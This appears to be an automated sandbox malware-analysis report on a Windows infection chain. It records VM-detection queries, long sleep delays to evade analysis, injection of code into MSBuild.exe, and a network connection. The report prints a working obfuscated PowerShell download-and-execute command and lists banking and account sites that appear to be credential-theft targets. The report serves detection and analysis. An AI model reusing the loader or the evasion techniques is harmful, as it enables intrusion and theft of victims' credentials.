Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: UserDomain();IWshNetwork2.UserName();IHost.CreateObject("WScript.Network");IWshNetwork2.AddWindowsPrinterConnection("\\SRVHOMOLOGDC1\Brother", "Brother");IWshNetwork2.AddWindowsPrinterConnection("\\SR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 3090000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2ED0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1435	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1432	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4106	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5638	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 2743	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 7084	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

API coverage: 4.8 %

Source: C:\Windows\System32\wscript.exe TID: 7232	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712	Thread sleep count: 4106 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708	Thread sleep count: 5638 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7944	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7944	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7960	Thread sleep count: 2743 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7960	Thread sleep count: 7084 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: wscript.exe, 00000000.00000003.1418969755.0000022664F07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1420986571.0000022662E1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1422636732.0000022662E1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1420543932.0000022664EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1420906818.0000022662E15000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: wscript.exe, 00000000.00000003.1418969755.0000022664F07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1420543932.0000022664EFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW^
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: MSBuild.exe, 00000012.00000002.2493067122.00000000012D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: tmp1BEA.tmp.dat.18.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Memory allocated: page read and write | page guard

System process connects to network (likely due to code injection or exploit)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe

Network Connect: 104.21.84.67 443

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_7664.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7664, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40A000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40C000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FF5008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgT